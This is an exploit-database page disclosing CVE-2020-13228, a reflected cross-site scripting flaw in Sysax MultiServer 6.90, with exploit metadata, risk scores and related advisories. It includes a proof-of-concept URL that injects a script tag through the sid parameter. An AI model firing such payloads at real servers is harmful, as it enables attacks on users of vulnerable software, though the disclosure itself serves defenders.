Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtLuca Epifanio1337DAY-ID-34558
HistoryJun 12, 2020 - 12:00 a.m.

Sysax MultiServer 6.90 - Reflected Cross Site Scripting Vulnerability

2020-06-1200:00:00
Luca Epifanio
0day.today
57

EPSS

0.002

Percentile

54.3%

JSON

Exploit for multiple platform in category web applications

# Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting
# Google Dork: n.d.
# Date: 2020-06-02
# Exploit Author: Luca Epifanio (wrongsid3)
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download.htm
# Version: MultiServer 6.90
# Tested on: Windows 10 x64
# CVE : CVE-2020-13228

There is reflected XSS via the /scgi sid parameter.

PoC:
http://192.168.88.131/scgi?sid=684216c78659562c92775c885e956585cdb180fd
<script>alert("XSS")</script>&pid=transferpage2_name1_fff.htm

PoC Screen: https://pasteboard.co/J9eE2GQ.png

#  0day.today [2020-07-19]  #

Related

prion 1
cve 1
nvd 1
packetstorm 1
cvelist 1
exploitdb 1
checkpoint_advisories 1
prion
prion
Cross site scripting
2020-06-02 14:15:00
cve
cve
CVE-2020-13228
2020-06-02 14:15:10
nvd
nvd
CVE-2020-13228
2020-06-02 14:15:10
packetstorm
packetstorm
Sysax MultiServer 6.90 Cross Site Scripting
2020-06-14 00:00:00
cvelist
cvelist
CVE-2020-13228
2020-06-02 13:51:45
exploitdb
exploitdb
Sysax MultiServer 6.90 - Reflected Cross Site Scripting
2020-06-12 00:00:00
checkpoint_advisories
checkpoint_advisories
Cross-Site Scripting Scanning Attempt (CVE-2015-4661; CVE-2019-16385; CVE-2019-9167; CVE-2020-10946; CVE-2020-12261; CVE-2020-13228; CVE-2020-13627; CVE-2020-13628; CVE-2020-14953; CVE-2021-21801; CVE-2021-25080; CVE-2022-25305; CVE-2022-28102)
2016-03-22 00:00:00

EPSS

0.002

Percentile

54.3%

JSON
Related for 1337DAY-ID-34558
prion1cve1nvd1packetstorm1cvelist1exploitdb1checkpoint_advisories1